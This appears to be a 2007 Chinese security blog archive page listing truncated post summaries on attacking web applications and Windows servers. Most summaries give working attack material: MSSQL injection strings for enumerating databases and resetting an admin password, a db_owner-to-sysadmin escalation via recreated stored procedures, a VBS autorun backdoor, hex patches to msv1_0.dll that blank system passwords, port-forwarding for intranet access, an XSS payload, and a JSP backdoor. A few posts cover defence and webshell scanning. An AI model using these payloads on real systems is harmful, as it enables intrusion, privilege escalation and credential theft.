07 2007 档案
joekoe CMS 4.0 上传漏洞
摘要:影响版本:joekoe CMS 4.0 详细说明:Joekoe CMS 4.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用的要求,为你...
阅读全文
joekoe CMS 4.0 注入漏洞
摘要:影响版本:joekoe CMS 4.0 详细说明:Joekoe CMS 4.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用的要求,为你...
阅读全文
如何突破数据库Loop防下载
摘要:仅仅是一个思路,有人突破了动易2006数据库开头用或者redirect
阅读全文
对于一个过防火墙的方法写的程序
摘要:文章作者:28度的冰(www.bit.edu.cn)信息来源:邪恶八进制信息安全团队(www.eviloctal.com)不知道原创是在什么地方看到了,一种比较bt的过防火墙的方式:停掉IIS,把终端服务端口开到80.就这个我写了个程序,请看: Copy code F:\C\AntiFW>AntiFW[url]http://www.bit.edu.cn/[/url] QQ:540085595Us...
阅读全文
dbowner提权,只要有注入点就有系统权限
摘要:不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_...
阅读全文
img标签在安全上的作用
摘要:恩,太多了.....以前的关于xsrf和portscan的就无声的忽略吧..昨天看到一个很有意思嘿, 能探测出装的软件哪...不错吧,如果是杀毒呢?顺便说下res协议,好象是ie里用来定位资源的,譬如可以定位到某个exe文件里的某个资源,用 exescope就可以分析.img的src是无域的限制的,src属性的好象都没限制......但是ff好象有点不一样- -!另外一个就是在渗透时的作用,很多的...
阅读全文
mssql2005注入方法
摘要:累死朕了,纯手工猜了个站..还是mssql2005..边找资料边爆..整理如下/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master]...
阅读全文
新型 SQL 截断攻击和防御方法
摘要:利用 SQL 注入方法的漏洞攻击已经引起了广泛关注,因为这些漏洞能够穿过防火墙和入侵检测系统,从而破坏您的数据层。无论是第一级还是第二级注入攻击,如果您看一下基本的代码模式,它与其他任何注入攻击问题都类似,即您在构造语句时都使用了不受信任的数据。大多数开发人员已经开始通过在后端使用参数化 SQL 查询和存储过程来减少 Web 前端的这些漏洞,但有些情况下,开发人员仍使用动态构建的 SQL,例如根据用户输入或为 C/C++ 编写的应用程序构造数据定义语言 (DDL) 语句时。
在本文中我将讨论一些新观点,其结果可能会修改 SQL 语句或注入 SQL 代码,即使代码对分隔字符进行了转义。我首先介绍一些构建分隔标识符和 SQL 字符串的最佳实践,然后我将介绍攻击者注入 SQL 代码的几种新方法,以帮助您保护您的应用程序。
阅读全文
"磁盘或网络错误"或未使用Jet时返回"指定错误"解决办法
摘要:windows\temp目录权限问题!
阅读全文
MS Windows Explorer.exe Gif Image Denial of Service Exploit
摘要:[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!#!/usr/bin/perl################################################################ Bug Found By ::DeltahackingTEAM### Coded By Reza.Yavari (Dr.Pantagon)###Web Site::...
阅读全文
针对抓win2003系统密码的诡计
摘要:命令行下卸载win2003 sp1/sp2%systemroot%\$NtServicePackUninstall$\spuninst\spuninst /U按无人参与模式删除 service pack。如果使用此选项,那么在卸载 SP1 的过程中,只有出现致命错误才会显示提示。 /Q按安静模式删除 SP1,此模式与无人参与模式相同,只是隐藏了用户界面。如果使用此选项,那么在卸载 SP1 的过程...
阅读全文
利用ORACLE的system帐户默认口令提升权限
摘要:近日 偶到一主机上逛了一圈 主机的配置 还算是安全 偏偏一个比较隐藏的目录下 残留一upfile.asp 结果轻轻松松的得到一webshell接着在主机上逛了逛 拿出superscan从外面扫了下 只开放了80端口 从user\程序目录里 发现有一快捷方式firecontrol 好象是某款硬件防火墙的控制台?WEBSHELL下检测了下 开放的服务 发现一般的可提权的方法 都不可行 无SERV-U等...
阅读全文
另外一个以前的文章:一段程序的饶过
摘要:他有个检测函数放在check.inc中// 看看吧:“ sub check()Fy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_...
阅读全文
好玩,以前自己写的东西,竟然忘记了
摘要:Alexa 排名是目前常引用的用来评价某一网站访问量的一个指标。事实上,Alexa 排名是根据对用户下载并安装了 Alexa Tools Bar 嵌入到 IE 等浏览器,从而监控其访问的网站数据进行统计的,因此,其排名数据并不具有绝对的权威性。但由于其提供了包括综合排名、到访量排名、页面访问量排名等多个评价指标信息,且目前尚没有而且也很难有更科学、合理的评价参考,大多数人还是把它当作当前较为权威的...
阅读全文
管理员不留心的后门技巧
摘要:1、如果服务器有可插拔硬件,比如U盘:首先:autorun.inf,内容如下它们的意思是不管你用双击,还是右键打开,还是资源管理器,都会运行我们的efan.vbs[autorun] OPEN=efan.vbs shell\open=打开(&O) shell\open\Command=efan.vbs shell\open\Default=1 shell\explore=资源管理器(&X) shel...
阅读全文
cmd或shell下读终端端口
摘要:1.通用方法regedit /e c:\3389.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"type c:\3389.reg | find "PortNumber"del c:\3389.reg2.xp和2003下reg query "HKEY_LOCAL...
阅读全文
OllyDbg Format String 0day分析和利用
摘要:适合读者:溢出爱好者前置知识:汇编语言、缓冲区溢出基本原理OllyDbg Format String 0day分析和利用文/图 gyzy[江苏大学信息安全系&EST]OD作为一款Ring3下的调试器以优异的性能博得了广大密界爱好者的一致肯定,就在最近milw0rm上公布了一个OD 0 day的POC(OllyDbg v110 Local Format String Exploit),以前写了很多栈...
阅读全文
PHP168 CMS的一次新异漏洞分析
摘要:by 李丰初admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞if( $_POST[loginname] && $_POST[loginpwd] ){if( $webdb[yzImgAdminLogin] ){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){die("验证码不符合");}else...
阅读全文
JSP一句话后门
摘要:这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url! http://localhost/1.jsp?f=1.txt&t=hello 然后:http://localhost/1.txt 就出来了 内容为 hello .....
阅读全文
Exploit Sites 和0day公布的站点大全
摘要:国外www.frsirt.com/exploits/es.wikipedia.org/wiki/Exploitwww.securiteam.com/exploitshttp://shinnai.altervista.org/国内http://www.z1z8.com/ http://www.neeao.com/exp/1 www.frsirt.comhttp://www.dswlab.com/vi...
阅读全文
dvbbs8.0获得webshell方法
摘要:根据测试 End if backpath=server.mappath(backpath) If Lcase(Mid(backpath,instrRev(backpath,".")+1))"mdb" Then response.write "保存数据库名不合法" Response.End End If 这里 我们可以把路径改为xxx...
阅读全文
PHP后门隐藏技术再探
摘要:测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来说大多是插入或者include()函数隐藏然后修改文件时间等等。网上多的很我就...
阅读全文
里应外合,Linux下的后门和日志工具
摘要:攻入Linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具。1、从这里延伸:后门和连接工具(1)HttptunnelTunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。说得简单点,...
阅读全文
Symantec AntiVirus symtdi.sys驱动本地权限提升漏洞
摘要:受影响系统:Symantec Norton AntiVirus 2006Symantec Norton AntiVirus 2005Symantec Norton Personal Firewall 2006Symantec Norton Personal Firewall 2005Symantec Norton AntiSpam 2005Symantec Client Security 3.1S...
阅读全文
Tomcat漏洞利用
摘要:by 鬼仔有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html/admin 目录下的利用:Service--host--actions--Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http:...
阅读全文
一些小技巧与常见问题解决方法
摘要:1、当你得到管理员密码却又无法找到后台时不妨试试google。输入site:xxx.com intext:admin / *意思是查找网址包含xxx.com 文字中包含admin的所有网页*/ 或site:xxx.com inurl:admin /* 查询地址中包含admin的链接*/ site:xxx.com intitle:admin /* 查询tittle中包含admin的链...
阅读全文
OBLOG4.5 商业SQL版 漏洞解析
摘要:来源:鬼仔's Blog声明:本文乃提供脚本学习 不是为了让大家去黑更多的站而写 漏洞已修补 网上的已经没有有漏洞的站了影响版本:oblog4.5 商业SQL (非Final版)漏洞补丁地址:http://down.oblog.cn/oblog4/patch/Oblog45_Final_Patch0619.rar漏洞文件:api/API_Response.asp打开api/API_Response...
阅读全文
3389登陆记录的清除
摘要:很多时候,因为内网信任或者vlan等我们在外面连不上目标的3389终端,又不可能每次都靠反弹后门来htran 一般来说,可以在内网信任的任何一台机器(比如web)上来直接mstsc来连接内网ip 默认是空记录,或者是仅有几个被连接过的ip记录,当我们连接完内网新的ip的时候,连接记录会默认显示出来,很苦恼啊。有经验的管理员基本上都可以发现 清理很简单 HKEY_CURRENT_USER\Softw...
阅读全文
入侵ASP.net网站的经验
摘要:1、对一般遇到.net的网站时通常会注册个用户第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过2、第二种就是注入了, 在?id=xx后加单引号 " ' "一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面而且国内大多.net都是使用MSSQL数据库发现注入点也可以从login下手 其实这个方法目前的成功率在75%3、不过遇到搜索型的,和没错误信息回显的时候 在这里就卡住了大家可...
阅读全文
dvbbs8.0 跨站
摘要:漏洞页面:mymodify.asp利用方法:在自定义头像中输入跨站代码:"/>空格
阅读全文
Flashfxp解密的VBS
摘要:Rem ----codz by ivory-----------Function Decrypt(password)magic = Split("121,65,51,54,122,65,52,56,100,69,104,102,114,118,103,104,71,82,103,53,55,104,53,85,108,68,118,51", ",")chrlast = cint("&H" & Mi...
阅读全文
Internet Explorer 0day Exploit
摘要:There is an input validation flaw in Internet Explorer that allows you to specify arbitrary arguments to the process r...
阅读全文
清空系统密码(0day)
摘要:system32下和dllcache下分别 有个msv1_0.dllxp sp2 F8 10 75 11 B0 01 8B 4D修改为E0 00 75 11 B0 01 8B 4D2k professinalF8 10 0F 84 71 FF FF修改为E0 00 0F 84 71 FF FF2k sp4F8 10 75 11 b0 01 8b 4D修改为E0 00 75 11 b0 01 8b ...
阅读全文
通杀动易2005的 XSS 攻击
摘要:动易2005里面,留言的时候存在一个XSS。攻击方法如下 :首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了):http://localhost/PowerE...
阅读全文
入侵kk回忆录
摘要:领土之争 ——入侵kk回忆录作者:唐不狐(blog.wang1.cn)成文日期:2007.6.30写在前面:老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。1.石榴裙下的kk说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终以arp欺骗获取权限。k...
阅读全文
BBSXP 2007的初探
摘要:BBSXP 2007的初探 首先感谢sobiny。最近B.C.T的朋友似乎发布了很多BBSXP2007的漏洞。我今天在官方下了一个BBSXP2007的最新版本(发布日期:2007年7月7日发布)。大致看了一下,在一种极端的情况下,说明一下漏洞的利用方法。 举例说明,search.as...
阅读全文
突破内网
摘要:C:\>lcx.exe第一条和第三配合使用。如在本机上监听 -listen 51 3389,在肉鸡上运行-slave 本机ip51 肉鸡ip 3389那么在本地连127.0.1就可以连肉鸡的3389.第二条是本机转向。如-tran 51 127.0.0.1 3389 ==========[Usage of Packet Transmit:] lcx.exe - [-log logfile][o...
阅读全文
饶过检查ASP木马的DD
摘要:今天在LCX牛牛的BLOG上看到了一个新的绕过那个什么查ASP 马的东西。。怎么说呢,其实如果单说写文件到服务器上来留后门的话。可能大概也只有10多种方法吧可以绕过吧。但是像这种可以直接执行的,好象还少着。。既然他们都公布得愉快。我也发一个我觉得拿得出手的吧。等着那些检测程序加入新的特征吧,啊哈哈。 引用 大家其实也都看得出来,ExecuteStatement里面的东西可以无限变形。。其实...
阅读全文
利用insertAdjacentHTML方法跨站
摘要:object.insertAdjacentHTML(sWhere, sText)第二个“HTML代码”是要插入的内容。第一个参数有四个变量,他们的名称及位置是这样的:“["beforeBegin"在开始标记前]["afterBegin"在开始标记后] 该标记中显示的文字 ["beforeEnd"在结束标记前]["afterEnd"在结束标记后] ”简单利用方法(这样避免了弹窗):其中key.asp...
阅读全文
LBS blog trackback注射漏洞解析和exp
摘要:source/src_trackback.asp中的注射 function trackbackSave(){var tbEntry={"log_id": input["id"],"url": input["url"],"title": input["title"],"excerpt": input["excerpt"],"blog": input["blog_name"]}// These fu.
阅读全文
请注意那些容易被忽略的SQL注入技巧
摘要:下面我要谈到一些Sqlserver新的Bug,虽然本人经过长时间的努力,当然也有点幸运的成分在内,才得以发现,不敢一个人独享,拿出来请大家鉴别。 1.关于Openrowset和Opendatasource 可能这个技巧早有人已经会了,就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下: ...
阅读全文
网上银行等电子支付平台的WEB登陆安全性简要分析
摘要:前言:本文还是去年年初写的,当时出于安全考虑没放出来。现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额,并建议用户使用动态口令卡或者USB Key,总体安全系数有所提高。 随着子商务的普及,网上银行以及在线电子支付等方式逐渐被网民所接受和喜爱。但是网上银行以及电子商务支付平台的安全性不容乐观。尽管各网上银行采取SSL加密防止通过嗅探网络封包的方式截取密码;对于防止WEB登陆时密码...
阅读全文
动易messagebox总结
摘要:http://192.168.1.254/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=3);%20declare%20@a%20sysname%20select%20@a=0x3300%20update%20pe_admin%20set%20password=@a%20where%20id=1--); declare @a...
阅读全文
DNS(域名服务器)欺骗技术
摘要:概述:什么是DNS欺骗?DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入 www.google.com的网址然后回车。那么在这背后又有什么事情正在进行着呢?一般而言,你的浏览器将会向DNS服务器发送一个请求,从而要求得到与www.google.com相匹配的IP地址,DNS服务器则会告诉你的...
阅读全文
bbsxp2007 SQL漏洞
摘要:1、 bbsxp 2007斑竹权限注射 moderation.asp中的这些代码if Request.ServerVariables("Request_method") = "POST" thenselect case Request.Form("Item")case "BatchDel"IsDel=Request.Form("IsDel")for each ho in Request.Form(...
阅读全文
脚本安全配置器
摘要:/Files/allyesno/safe.rar本软件主要作为服务器的安全设置使用,以及个人机增加安全设置和防范脚本病毒使用。对于服务器的设置主要用于防范现在流行的脚本木马,从而提高服务器的安全性。软件的实现是通过卸载木马常使用的几个主要组件、修改组件名、设置磁盘权限、设置目录权限、黑客常使用的系统文件权限(如cmd.exe、net.exe、net1.exe等)、对于一些黑客提权的目录也作了权限设...
阅读全文
网站程序安全分析器 VB源码
摘要:本程序通杀:ASP ASPX PHP CGI JSP VBS 等脚本WebShell并能查出99%加密过的脚本WebShell后来发现..精度越高误杀越高...基本做到宁误扫三千不放过1马~其实是利用串判断.原理很简单.有很多人向偶要代码.想到人家ScanWebshell都贡献出来了~偶要是不贡献出来就不厚道咯.以下是全部代码. CODE: Private Declare Function...
阅读全文
我的欺骗肉鸡
摘要:文章作者:冷月孤枫 备注:QQ:89224874 个人主页:http://www.cnblogs.com/allyesno/ 兵法有云:知己知彼,百战不殆。同样我们抓肉鸡也要这样,首先我们应确立这次的目标“刚刚学习网页制作的爱好者,对于免费空间无限的渴望者”。这次我们的工作主要放在页面的伪造上,加上恰当的衔接,使其...
阅读全文
浙公网安备 33010602011771号